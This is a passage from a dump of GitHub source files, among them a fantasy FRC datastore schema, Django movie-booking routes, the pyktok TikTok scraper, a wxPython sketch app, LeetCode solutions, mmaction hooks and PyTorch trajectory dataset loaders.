parent=choice_key_val)\n\n\ndef draft_pick_key(league_key_val, position):\n \"\"\"Constructs a Datastore key for a draft pick entity with a league_key as parent and a position as id\"\"\"\n return ndb.Key(DraftPick, str(position), parent=league_key_val)\n\n\nclass League(ndb.Model):\n \"\"\"Stores players in the league and the league specific settings\"\"\"\n players = ndb.IntegerProperty(repeated=True) # Deprecated?\n name = ndb.StringProperty()\n snake_draft = ndb.BooleanProperty()\n draft_current_position = ndb.IntegerProperty()\n draft_current_timeout = ndb.DateTimeProperty()\n auto_start_draft_time = ndb.DateProperty()\n time_per_draft_pick = ndb.FloatProperty() #Minutes\n league_access_type = ndb.StringProperty()\n league_player_size_limit = ndb.IntegerProperty()\n number_of_locked_teams = ndb.IntegerProperty()\n number_of_draft_rounds = ndb.IntegerProperty()\n roster_size = ndb.IntegerProperty()\n active_lineup_size = ndb.IntegerProperty()\n\n\n\nclass RootEvent(ndb.Model):\n \"\"\"Stores the data for an entire event, differs from TeamEvent by having a larger scope\"\"\"\n name = ndb.StringProperty()\n teams = ndb.IntegerProperty(repeated=True)\n week = ndb.IntegerProperty()\n\n\nclass RootTeam(ndb.Model):\n \"\"\"Stores information such as scheduling and team name\"\"\"\n name = ndb.StringProperty()\n events = ndb.StringProperty(repeated=True)\n address = ndb.StringProperty()\n latlon = ndb.StringProperty()\n total_points = ndb.IntegerProperty()\n\n\nclass Account(ndb.Model):\n \"\"\"Stores data for an individual account\"\"\"\n nickname = ndb.StringProperty()\n league = ndb.StringProperty()\n\n #In the form described in https://github.com/smarthimandrew/FantasyFRC/issues/12\n schedule = ndb.StringProperty(repeated=True)\n record = ndb.StringProperty(repeated=True) # Uses the record variables in globals\n\n\nclass TeamEvent(ndb.Model):\n \"\"\"Stores a team's data for a single event\"\"\"\n rank = ndb.IntegerProperty()\n# qualification_score = ndb.IntegerProperty()\n# assist_points = ndb.IntegerProperty()\n# autonomous_points = ndb.IntegerProperty()\n# truss_and_catch_points = ndb.IntegerProperty()\n# teleop_points = ndb.IntegerProperty()\n win = ndb.IntegerProperty()\n loss = ndb.IntegerProperty()\n tie = ndb.IntegerProperty()\n# disqualified = ndb.IntegerProperty()\n played = ndb.IntegerProperty()\n awards = ndb.IntegerProperty(repeated=True)\n award_names = ndb.StringProperty(repeated=True)\n elimination_progress = ndb.IntegerProperty()\n\n\nclass Choice(ndb.Model):\n \"\"\"Stores all of the draft data for a single account for a single league\"\"\"\n current_team_roster = ndb.IntegerProperty(repeated=True)\n\n\nclass Lineup(ndb.Model):\n \"\"\"Stores the lineup for a single week for a single account\"\"\"\n active_teams = ndb.IntegerProperty(repeated=True)\n\n\nclass DraftPick(ndb.Model):\n \"\"\"Stores all of the information about one draft pick for a single league\"\"\"\n player = ndb.StringProperty()\n team = ndb.IntegerProperty()\n display_number = ndb.IntegerProperty()\n","repo_name":"Andrew-Dickinson/FantasyFRC","sub_path":"datastore_classes.py","file_name":"datastore_classes.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27837363265","text":"\"\"\"movie_project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom movie import views as movie_views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', movie_views.home, name='home'),\n path('register/', movie_views.register, name='register'),\n path('bookings/', movie_views.bookings, name='bookings'),\n path('book/<int:movie_id>/', movie_views.book, name='book'),\n path('view_details/<int:movie_id>', movie_views.view_details, name='view_details'),\n path('customer_booking/<int:customer_id>/', movie_views.customer_booking, name='customer_booking'),\n path('cancel/<int:ticket_id>', movie_views.cancel, name='cancel'),\n\n]\n","repo_name":"bubblebeam/Movie_ticket_booking_app","sub_path":"movie_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39973174351","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 14 14:06:01 2022\n\n@author: freelon\n\"\"\"\n\nimport browser_cookie3\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport json\nimport numpy as np\nimport os\nimport pandas as pd\nimport random\nimport re\nimport requests\nimport time\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options as ChromeOptions\nfrom selenium.webdriver.chrome.service import Service as ChromeiumService #sic\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\nfrom selenium.webdriver.firefox.service import Service as FirefoxService\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.core.utils import ChromeType\nfrom webdriver_manager.firefox import GeckoDriverManager\n\nheaders = {'Accept-Encoding': 'gzip, deflate, sdch',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'keep-alive'}\ncookies = browser_cookie3.load()\nurl_regex = '(?<=\\.com/)(.+?)(?=\\?|$)'\n\ndef deduplicate_metadata(metadata_fn,video_df,dedup_field='video_id'):\n if os.path.exists(metadata_fn):\n metadata = pd.read_csv(metadata_fn,keep_default_na=False)\n combined_data = pd.concat([metadata,video_df])\n combined_data[dedup_field] = combined_data[dedup_field].astype(str)\n else:\n combined_data = video_df\n return combined_data.drop_duplicates(dedup_field)\n\ndef generate_data_row(video_obj):\n data_header = ['video_id',\n 'video_timestamp',\n 'video_duration',\n 'video_locationcreated',\n 'video_diggcount',\n 'video_sharecount',\n 'video_commentcount',\n 'video_playcount',\n 'video_description',\n 'video_is_ad',\n 'video_stickers',\n 'author_username',\n 'author_name',\n 'author_followercount',\n 'author_followingcount',\n 'author_heartcount',\n 'author_videocount',\n 'author_diggcount',\n 'author_verified']\n data_list = []\n data_list.append(video_obj['id'])\n try:\n ctime = video_obj['createTime']\n data_list.append(datetime.fromtimestamp(int(ctime)).isoformat())\n except Exception:\n data_list.append('')\n try:\n data_list.append(video_obj['video']['duration'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['locationCreated'])\n except Exception:\n data_list.append('')\n try:\n data_list.append(video_obj['stats']['diggCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['stats']['shareCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['stats']['commentCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['stats']['playCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['desc'])\n except Exception:\n data_list.append('')\n try:\n data_list.append(video_obj['isAd'])\n except Exception:\n data_list.append(False)\n try:\n video_stickers = []\n for sticker in video_obj['stickersOnItem']:\n for text in sticker['stickerText']:\n video_stickers.append(text)\n data_list.append(';'.join(video_stickers))\n except Exception:\n data_list.append('')\n try:\n data_list.append(video_obj['author']['uniqueId'])\n except Exception:\n try:\n data_list.append(video_obj['author'])\n except Exception:\n data_list.append('')\n try:\n data_list.append(video_obj['author']['nickname'])\n except Exception:\n try:\n data_list.append(video_obj['nickname'])\n except Exception:\n data_list.append('')\n try:\n data_list.append(video_obj['authorStats']['followerCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['authorStats']['followingCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['authorStats']['heartCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['authorStats']['videoCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['authorStats']['diggCount'])\n except Exception:\n data_list.append(np.nan)\n try:\n data_list.append(video_obj['author']['verified'])\n except Exception:\n data_list.append(False)\n data_row = pd.DataFrame(dict(zip(data_header,data_list)),index=[0])\n return data_row\n#currently unused, but leaving it in case it's needed later\n'''\ndef fix_tt_url(tt_url):\n if 'www.' not in tt_url.lower():\n url_parts = tt_url.split('://')\n fixed_url = url_parts[0] + '://www.' + url_parts[1]\n return fixed_url\n else:\n return tt_url\n'''\ndef get_tiktok_json(video_url,browser_name=None):\n global cookies\n if browser_name is not None:\n cookies = getattr(browser_cookie3,browser_name)(domain_name='www.tiktok.com')\n tt = requests.get(video_url,\n headers=headers,\n cookies=cookies,\n timeout=20)\n # retain any new cookies that got set in this request\n cookies = tt.cookies\n soup = BeautifulSoup(tt.text, \"html.parser\")\n tt_script = soup.find('script', attrs={'id':\"SIGI_STATE\"})\n try:\n tt_json = json.loads(tt_script.string)\n except AttributeError:\n print(\"The function encountered a downstream error and did not deliver any data, which happens periodically for various reasons. Please try again later.\")\n return\n return tt_json\n\ndef save_tiktok(video_url,\n save_video=True,\n metadata_fn='',\n browser_name=None):\n if save_video == False and metadata_fn == '':\n print('Since save_video and metadata_fn are both False/blank, the program did nothing.')\n return\n\n tt_json = get_tiktok_json(video_url,browser_name)\n video_id = list(tt_json['ItemModule'].keys())[0]\n\n if save_video == True:\n regex_url = re.findall(url_regex,video_url)[0]\n video_fn = regex_url.replace('/','_') + '.mp4'\n tt_video_url = tt_json['ItemModule'][video_id]['video']['downloadAddr']\n headers['referer'] = 'https://www.tiktok.com/'\n # include cookies with the video request\n tt_video = requests.get(tt_video_url,allow_redirects=True,headers=headers,cookies=cookies)\n with open(video_fn, 'wb') as fn:\n fn.write(tt_video.content)\n print(\"Saved video\\n\",tt_video_url,\"\\nto\\n\",os.getcwd())\n\n if metadata_fn != '':\n data_slot = tt_json['ItemModule'][video_id]\n data_row = generate_data_row(data_slot)\n try:\n user_id = list(tt_json['UserModule']['users'].keys())[0]\n data_row.loc[0,\"author_verified\"] = tt_json['UserModule']['users'][user_id]['verified']\n except Exception:\n pass\n if os.path.exists(metadata_fn):\n metadata = pd.read_csv(metadata_fn,keep_default_na=False)\n combined_data = pd.concat([metadata,data_row])\n else:\n combined_data = data_row\n combined_data.to_csv(metadata_fn,index=False)\n print(\"Saved metadata for video\\n\",video_url,\"\\nto\\n\",os.getcwd())\n\ndef save_tiktok_multi_page(tiktok_url, #can be a user, hashtag, or music URL\n save_video=False,\n save_metadata=True,\n metadata_fn='',\n browser_name=None):\n tt_json = get_tiktok_json(tiktok_url,browser_name)\n data_loc = tt_json['ItemModule']\n regex_url = re.findall(url_regex,tiktok_url)[0]\n video_fn = 'tiktok_com_' + regex_url.replace('/','_') + '.mp4'\n if save_metadata == True and metadata_fn == '':\n metadata_fn = regex_url.replace('/','_') + '.csv'\n data = pd.DataFrame()\n\n for v in data_loc:\n data = pd.concat([data,generate_data_row(data_loc[v])])\n if save_video == True:\n video_url = 'https://www.tiktok.com/@' + data_loc[v]['author'] + '/video/' + data_loc[v]['id']\n save_tiktok(video_url,True)\n if save_metadata == True:\n data = deduplicate_metadata(metadata_fn,data)\n data.to_csv(metadata_fn,index=False)\n print('Saved',len(data_loc),'videos and/or lines of metadata')\n\ndef save_tiktok_multi_urls(video_urls,\n save_video=True,\n metadata_fn='',\n sleep=4,\n browser_name=None):\n if type(video_urls) is str:\n tt_urls = open(video_urls).read().splitlines()\n else:\n tt_urls = video_urls\n for u in tt_urls:\n save_tiktok(u,save_video,metadata_fn,browser_name)\n time.sleep(random.randint(1, sleep))\n print('Saved',len(tt_urls),'videos and/or lines of metadata')\n\ndef save_visible_comments(video_url,\n comment_fn=None,\n browser='chromium'):\n start_time = time.time()\n c_options = ChromeOptions()\n c_options.add_argument(\"--headless\")\n f_options = FirefoxOptions()\n f_options.add_argument(\"--headless\")\n if browser == 'chromium':\n driver = webdriver.Chrome(service=ChromeiumService(\n ChromeDriverManager(\n chrome_type=ChromeType.CHROMIUM).install()),\n options=c_options)\n elif browser == 'chrome':\n driver = webdriver.Chrome(service=ChromeiumService(\n ChromeDriverManager().install()),\n options=c_options)\n elif browser == 'firefox':\n driver = webdriver.Firefox(service=FirefoxService(\n GeckoDriverManager().install()),\n options=f_options)\n driver.get(video_url)\n try:\n wait = WebDriverWait(driver,10)\n wait.until(EC.presence_of_element_located((By.XPATH, \"//*[contains(@class,'SpanUserNameText')]\")))\n except TimeoutException:\n print(video_url,\"has no comments\")\n return\n\n soup = BeautifulSoup(driver.page_source, \"html.parser\")\n ids_tags = soup.find_all('div',{'class':re.compile('DivCommentContentContainer')})\n comment_ids = [i.get('id') for i in ids_tags]\n names_tags = soup.find_all('a',attrs={'class':re.compile(\"StyledUserLinkName\")})\n styled_names = [i.text.strip() for i in names_tags]\n screen_names = [i.get('href').replace('/','') for i in names_tags]\n comments_tags = soup.find_all('p',attrs={'class':re.compile(\"PCommentText\")})\n comments = [i.text.strip() for i in comments_tags]\n likes_tags = soup.find_all('span',attrs={'class':re.compile('SpanCount')})\n likes = [int(i.text.strip())\n if i.text.strip().isnumeric()\n else i.text.strip()\n for i\n in likes_tags]\n timestamp = datetime.now().isoformat()\n data_header = ['comment_id','styled_name','screen_name','comment','like_count','video_url','time_collected']\n data_list = [comment_ids,styled_names,screen_names,comments,likes,[video_url]*len(likes),[timestamp]*len(likes)]\n data_frame = pd.DataFrame(data_list,index=data_header).T\n\n if comment_fn is None:\n regex_url = re.findall(url_regex,video_url)[0]\n comment_fn = regex_url.replace('/','_') + '_tiktok_comments.csv'\n combined_data = deduplicate_metadata(comment_fn,data_frame,'comment_id')\n combined_data.to_csv(comment_fn,index=False)\n print('Comments saved to file',comment_fn,'in',round(time.time() - start_time,2),'secs.')\n","repo_name":"chriisac/TikTok-Video-Download","sub_path":"venv/Lib/site-packages/pyktok/pyktok.py","file_name":"pyktok.py","file_ext":"py","file_size_in_byte":12593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34454480725","text":"import cStringIO\nimport urllib2\nimport simplejson\nimport wx\nimport cv2.cv as cv\nimport os\n\nclass Panel1(wx.Panel):\n\n#Create the panel, search box and search button\n def __init__(self, parent, id): \n wx.Panel.__init__(self, parent, id)\n self.index = 0\n self.current_image_id = \"-1\"\n self.btn = wx.Button(self, label=\"Search\", pos=(390, 500))\n self.btn.Bind(wx.EVT_BUTTON, self.searchButtonClick)\n self.control = wx.TextCtrl(self, size=(350, 30), pos=(20, 500))\n self.btn = wx.Button(self, label=\"Refresh Images\", pos=(490, 300))\n self.btn.Bind(wx.EVT_BUTTON, self.refresh_button_click)\n self.slider = wx.Slider(self, -1, 125, 0, 1000, (250,460))\n self.slider.Bind(wx.EVT_SCROLL_CHANGED, self.slider_position_changed)\n filedata= open(\"question.png\", \"rb\").read()\n stream = cStringIO.StringIO(filedata)\n image = wx.ImageFromStream(stream)\n self.question_bmp = wx.BitmapFromImage(image)\n self.button= [wx.BitmapButton(self, -1 ,self.question_bmp, (205, 5)),\n wx.BitmapButton(self, -1 ,self.question_bmp, (405, 5)),\n wx.BitmapButton(self, -1 ,self.question_bmp, (605, 5)),\n wx.BitmapButton(self, -1 ,self.question_bmp, (805, 5))]\n\n @staticmethod\n def search_image(search_string, index):\n url = ('https://ajax.googleapis.com/ajax/services/search/images?v=1.0&start='+str(index)+ '&imgsz=medium&q='+search_string+'&userip=INSERT-USER-IP')\n request = urllib2.Request(url, None, {'Referer': 'google.com'})\n response = urllib2.urlopen(request)\n return simplejson.load(response)\n\n @staticmethod\n def obtain_bmp_image(self, url):\n filedata = urllib2.urlopen(url).read()\n stream = cStringIO.StringIO(filedata)\n image = wx.ImageFromStream(stream)\n if(image.IsOk()):\n resizedimage = image.Scale(200, 200, wx.IMAGE_QUALITY_HIGH)\n return wx.BitmapFromImage(resizedimage)\n else:\n return self.question_bmp\n\n @staticmethod\n def render_outline_image(image_id, threshold):\n im=cv.LoadImage(\"Image\"+str(image_id)+\".bmp\", cv.CV_LOAD_IMAGE_COLOR)\n gray = cv.CreateImage((im.width, im.height), 8, 1)\n edge = cv.CreateImage((im.width, im.height), 8, 1)\n im_bw1 = cv.CreateImage((im.width, im.height), 8, 1)\n cv.CvtColor(im, gray, cv.CV_BGR2GRAY)\n cv.Not(gray, edge)\n im_white=cv.LoadImage(\"white.bmp\", cv.CV_LOAD_IMAGE_COLOR)\n white = cv.CreateImage((im_white.width, im_white.height), 8, 1)\n cv.Canny(gray, edge, threshold, 125 * 3, 3)\n # cv.Not(white, edge)\n cv.SaveImage(\"edge_image.png\", edge)\n jpg1 = wx.Image('edge_image.png', wx.BITMAP_TYPE_ANY).ConvertToBitmap()\n os.remove(\"edge_image.png\")\n return jpg1\n\n def refresh_button_click(self, event):\n for i in range(0,4):\n os.remove(\"Image\"+str(i)+\".bmp\");\n self.index+=4\n results = Panel1.search_image(self.control.GetValue(), self.index)\n for i in range(0,4):\n bmp = Panel1.obtain_bmp_image(self, results['responseData']['results'][i]['unescapedUrl'])\n self.button[i].SetBitmapLabel(bmp)\n #bitmapbutton=wx.BitmapButton(self,-1,bmp, (5 + i*200,5))\n #bitmapbutton.Bind(wx.EVT_LEFT_DOWN, lambda event, arg=i: self.onImageClick(event, arg))\n bmp.SaveFile(\"Image\"+str(i)+\".bmp\",wx.BITMAP_TYPE_BMP) \n\n def slider_position_changed(self,event):\n #Do Image Processing\n image = Panel1.render_outline_image(self.current_image_id, self.slider.GetValue())\n bitmapbutton=wx.BitmapButton(self,-1,image, (200,250))\n \n#Call Google API and retrieve images. Create bitmapbutton controls and display the images. Set onImageClick bindings\n def searchButtonClick(self, event):\n self.index = 1\n results = Panel1.search_image(self.control.GetValue(), self.index)\n for i in range(0,4):\n bmp = Panel1.obtain_bmp_image(self, results['responseData']['results'][i]['unescapedUrl'])\n self.button[i].SetBitmapLabel(bmp)\n #bitmapbutton=wx.BitmapButton(self,-1,bmp, (5 + i*200,5))\n self.button[i].Bind(wx.EVT_LEFT_DOWN, lambda event, arg=i: self.onImageClick(event, arg))\n\n bmp.SaveFile(\"Image\"+str(i)+\".bmp\",wx.BITMAP_TYPE_BMP)\n\n#Do image processing and show result \n def onImageClick(self,event,arg): \n #Do Image Processingc\n self.current_image_id = str(arg)\n image = Panel1.render_outline_image(self.current_image_id, self.slider.GetValue())\n bitmapbutton=wx.BitmapButton(self,-1,image, (200,250))\n \n \nwx.InitAllImageHandlers()\napp = wx.PySimpleApp()\nframe1 = wx.Frame(None, -1, \"Sketch-hi-5\", size = (1100, 650))\nPanel1(frame1,-1)\nframe1.Show(1)\napp.MainLoop()\n","repo_name":"hariwashere/sketchhi5","sub_path":"src/sketchhi5.py","file_name":"sketchhi5.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19761442399","text":"# https://leetcode.com/problems/check-if-a-string-contains-all-binary-codes-of-size-k/\n# 1461. Check If a String Contains All Binary Codes of Size K\n\n# Solution 1 (AC)\n# O(nk) sliding window \nclass Solution:\n def hasAllCodes(self, s: str, k: int) -> bool:\n isThere = [False]*(1<<k)\n i, j = 0, k-1\n while j < len(s):\n x = int(s[i:j+1], 2)\n #print(i, j, x)\n isThere[x] = True\n i += 1\n j += 1\n \n #print(isThere)\n return all(x is True for x in isThere)\n\n# Solution 2 (AC)\n# O(n) Rolling hash - looked at Discuss\nclass Solution:\n def hasAllCodes(self, s: str, k: int) -> bool:\n prev = int(s[:k], 2)\n vals = {prev}\n for i in range(k, len(s)):\n prev = prev*2 - (int(s[i-k])*(1<<k)) + int(s[i])\n vals.add(prev)\n \n return len(vals) == (1<<k)","repo_name":"Priyansh121096/leetcode","sub_path":"1461.py","file_name":"1461.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71010566134","text":"import torch\nfrom mmcv.utils import Registry, build_from_cfg\nimport torch.nn as nn\n\nMODULE_HOOKS = Registry('module_hooks')\n\n\ndef register_module_hooks(Module, module_hooks_list):\n handles = []\n for module_hook_cfg in module_hooks_list:\n hook_pos = module_hook_cfg.pop('hook_pos', 'forward_pre')\n if hook_pos == 'forward_pre':\n handle = Module.register_forward_pre_hook(\n build_from_cfg(module_hook_cfg, MODULE_HOOKS).hook_func())\n elif hook_pos == 'forward':\n handle = Module.register_forward_hook(\n build_from_cfg(module_hook_cfg, MODULE_HOOKS).hook_func())\n elif hook_pos == 'backward':\n handle = Module.register_backward_hook(\n build_from_cfg(module_hook_cfg, MODULE_HOOKS).hook_func())\n else:\n raise ValueError(\n f'hook_pos must be `forward_pre`, `forward` or `backward`, '\n f'but get {hook_pos}')\n handles.append(handle)\n return handles\n\n\n@MODULE_HOOKS.register_module()\nclass GPUNormalize:\n \"\"\"Normalize images with the given mean and std value on GPUs.\n\n Call the member function ``hook_func`` will return the forward pre-hook\n function for module registration.\n\n GPU normalization, rather than CPU normalization, is more recommended in\n the case of a model running on GPUs with strong compute capacity such as\n Tesla V100.\n\n Args:\n mean (Sequence[float]): Mean values of different channels.\n std (Sequence[float]): Std values of different channels.\n \"\"\"\n\n def __init__(self, input_format, mean, std):\n if input_format not in ['NCTHW', 'NCHW', 'NCHW_Flow', 'NPTCHW']:\n raise ValueError(f'The input format {input_format} is invalid.')\n self.input_format = input_format\n _mean = torch.tensor(mean)\n _std = torch.tensor(std)\n if input_format == 'NCTHW':\n self._mean = _mean[None, :, None, None, None]\n self._std = _std[None, :, None, None, None]\n elif input_format == 'NCHW':\n self._mean = _mean[None, :, None, None]\n self._std = _std[None, :, None, None]\n elif input_format == 'NCHW_Flow':\n self._mean = _mean[None, :, None, None]\n self._std = _std[None, :, None, None]\n elif input_format == 'NPTCHW':\n self._mean = _mean[None, None, None, :, None, None]\n self._std = _std[None, None, None, :, None, None]\n else:\n raise ValueError(f'The input format {input_format} is invalid.')\n\n def hook_func(self):\n\n def normalize_hook(Module, input):\n x = input[0]\n assert x.dtype == torch.uint8, (\n f'The previous augmentation should use uint8 data type to '\n f'speed up computation, but get {x.dtype}')\n\n mean = self._mean.to(x.device)\n std = self._std.to(x.device)\n\n with torch.no_grad():\n x = x.float().sub_(mean).div_(std)\n\n return (x, *input[1:])\n\n return normalize_hook\n\nclass STN(nn.Module):\n def __init__(self):\n super(STN, self).__init__()\n\n # Spatial transformer localization-network\n self.localization = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=7), #nn.Conv2d(1, 8, kernel_size=7) bykaihuang 输入数据维度是3\n nn.MaxPool2d(2, stride=2),\n nn.ReLU(True),\n nn.Conv2d(64 ,128, kernel_size=5),\n nn.MaxPool2d(2, stride=2),\n nn.ReLU(True)\n )\n\n # Regressor for the 3 * 2 affine matrix\n self.fc_loc = nn.Sequential(\n nn.Linear(128*156*116, 32),\n nn.ReLU(True),\n nn.Linear(32, 3 * 2)\n )\n # Initialize the weights/bias with identity transformation\n self.fc_loc[2].weight.data.zero_()\n self.fc_loc[2].bias.data.copy_(torch.tensor([1, 0, 0, 0, 1, 0], dtype=torch.float))\n\n # Spatial transformer network forward function\n def forward(self, x):\n print(\"#################x_shape:\",x.size())\n xs = self.localization(x)\n print(\"~~~~~~~~~~~~~~~~~xs.size:\",xs.size()) # xs=[2,128,196,332]\n xs = xs.view(-1,128*156*116)\n theta = self.fc_loc(xs)\n theta = theta.view(-1, 2, 3)\n\n grid = F.affine_grid(theta, x.size())\n x = F.grid_sample(x, grid)\n\n return x\n","repo_name":"giim-hf-lab/Intelligent-elderly-care-system","sub_path":"mmaction/utils/module_hooks.py","file_name":"module_hooks.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"5874594559","text":"import pickle\nimport json\nimport numpy as np\nfrom numpy import random\nimport torch\nimport torch.utils.data as data\n\nexpert_dataset_name = ['expert_s.pkl','exert_a.pkl']\nfail_dataset_name = ['fail_s.pkl','fail_a.pkl']\nTORCS_ACTION_FACTOR = 10\nclass torcs_dataset(data.Dataset):\n def __init__(self,root='./dataset/',train=True,split=0.1,num_traj=100,state_samples=20):\n self.root = root\n self.num_traj = num_traj\n self.s_dim = 29\n self.a_dim = 2\n self.state_samples = state_samples\n with open(root + 'expert_s.pkl', 'rb') as f:\n data = pickle.load(f)\n f.close()\n expert_s = np.asarray(data) # [24588 x 29]\n indexes_e = self.define_trajectory(expert_s) # [9]\n with open(root + 'expert_a.pkl', 'rb') as f:\n data = pickle.load(f)\n f.close()\n expert_a = np.asarray(data) # [24588 x 2]\n\n with open(root + 'fail_s.pkl', 'rb') as f:\n data = pickle.load(f)\n f.close()\n fail_s = np.asarray(data) # [24335 x 29]\n indexes_f = self.define_trajectory(fail_s)+expert_a.shape[0] # [54]\n indexes_f = indexes_f[0::4]\n with open(root + 'fail_a.pkl', 'rb') as f:\n data = pickle.load(f)\n f.close()\n fail_a = np.asarray(data) # [24335 x 2]\n print(np.mean(fail_a),np.mean(expert_a))\n self.traj_indexes = np.concatenate((indexes_e,indexes_f))\n trajectories_e = np.concatenate((expert_s,expert_a),axis=-1)\n trajectories_f = np.concatenate((fail_s,fail_a),axis=-1) \n self.trajectories = np.concatenate((trajectories_e,trajectories_f),axis=0)\n possible_index=[]\n traj_type = []\n self.total_type = self.traj_indexes.shape[0]\n for i,ind in enumerate(self.traj_indexes):\n try:\n possible_index.extend([a for a in range(ind+num_traj,self.traj_indexes[i+1]-num_traj)])\n traj_type.extend([i for _ in range(ind+num_traj,self.traj_indexes[i+1]-num_traj)])\n except:\n possible_index.extend([a for a in range(ind+num_traj,self.trajectories.shape[0]-num_traj)])\n traj_type.extend([i for _ in range(ind+num_traj,self.trajectories.shape[0]-num_traj)])\n self.possible_index = torch.LongTensor(possible_index)\n self.traj_types = torch.LongTensor(traj_type)\n self.trajectories = torch.FloatTensor(self.trajectories)\n self.traj_ = torch.unique(self.traj_types)\n \n def __getitem__(self, index):\n '''\n TODO\n start with right index! start with state\n '''\n traj_type = self.traj_[index]\n traj_index = torch.where(self.traj_types==traj_type)[0]\n perm = torch.randperm(traj_index.size(0))\n idx = perm[:2]\n samples = traj_index[idx]\n traj_1 = self.trajectories[samples[0]:samples[0]+self.num_traj,:]\n traj_2 = self.trajectories[samples[1]:samples[1]+self.num_traj,:]\n # Sample state, action \n random_index_1 = np.random.choice(np.arange(0,self.num_traj),self.state_samples)\n state_1 = traj_1[random_index_1,:self.s_dim].squeeze(0)\n action_1 = traj_1[random_index_1,self.s_dim:].squeeze(0)\n \n state_2 = traj_2[random_index_1,:self.s_dim].squeeze(0)\n action_2 = traj_2[random_index_1,self.s_dim:].squeeze(0)\n return traj_1,traj_2,state_1,action_1,state_2,action_2,traj_type\n \n def __len__(self):\n return self.traj_.size(0)\n \n def define_trajectory(self,states):\n init_state = states[0,:]\n a = np.where((states == init_state).all(axis=1))[0]\n return a\n\nMAX_LEN = 100\n\nclass synthetic_example(data.Dataset):\n def __init__(self,path = './dataset/sdata_6.json',state_only=True,fixed_len=False,num_traj=50,state_samples=40):\n self.num_traj = num_traj\n self.path = path\n self.state_samples = state_samples\n with open(self.path,'r') as jf:\n data = json.load(jf)\n self.traj_type=[]\n self.traj_len=[]\n self.state_only= state_only\n self.fixed_len = fixed_len\n if self.state_only:\n self.traj = torch.zeros((len(data),MAX_LEN*2))\n self.actions = torch.zeros((len(data),MAX_LEN*2))\n else:\n self.traj = torch.zeros((len(data),MAX_LEN*4))\n # Load Data\n for key in data:\n self.traj_type.append([data[key]['vel'],data[key]['noise'],data[key]['type']])\n traj_len = len(data[key]['states'][0])\n self.traj_len.append(traj_len)\n if self.state_only:\n traj = torch.zeros((2*traj_len))\n actions = torch.zeros((2*traj_len))\n traj[0::2] = torch.FloatTensor(data[key]['states'][0])\n traj[1::2] = torch.FloatTensor(data[key]['states'][1])\n traj = traj.repeat(int((MAX_LEN)/(traj_len)))\n actions[0::2] = torch.cat((torch.FloatTensor(data[key]['actions'][0]),torch.zeros(1)),dim=-1)*10\n actions[1::2] = torch.cat((torch.FloatTensor(data[key]['actions'][1]),torch.zeros(1)),dim=-1)*10\n actions = actions.repeat(int((MAX_LEN)/(traj_len)))\n self.actions[int(key),:] = actions\n else:\n traj = torch.zeros((4*traj_len))\n traj[0::4] = torch.FloatTensor(data[key]['states'][0])\n traj[1::4] = torch.FloatTensor(data[key]['states'][1])\n traj[2::4] = torch.cat((torch.FloatTensor(data[key]['actions'][0]),torch.zeros(1)),dim=-1)*10\n traj[3::4] = torch.cat((torch.FloatTensor(data[key]['actions'][1]),torch.zeros(1)),dim=-1)*10\n traj = traj.repeat(int((MAX_LEN)/(traj_len)))\n self.traj[int(key),:] = traj\n self.traj_type = torch.FloatTensor(self.traj_type)\n \n def __getitem__(self, index):\n traj = self.traj[index,:]\n traj_type = self.traj_type[index]\n if self.fixed_len:\n traj_len = self.num_traj\n reduced = 0\n else:\n reduced = random.randint(1,10) \n traj_len = self.num_traj - reduced\n sampled = torch.randperm(MAX_LEN-traj_len)\n # sampled = random.choice([0,25,50],2)\n if self.state_only:\n temp = torch.zeros((reduced*2))\n 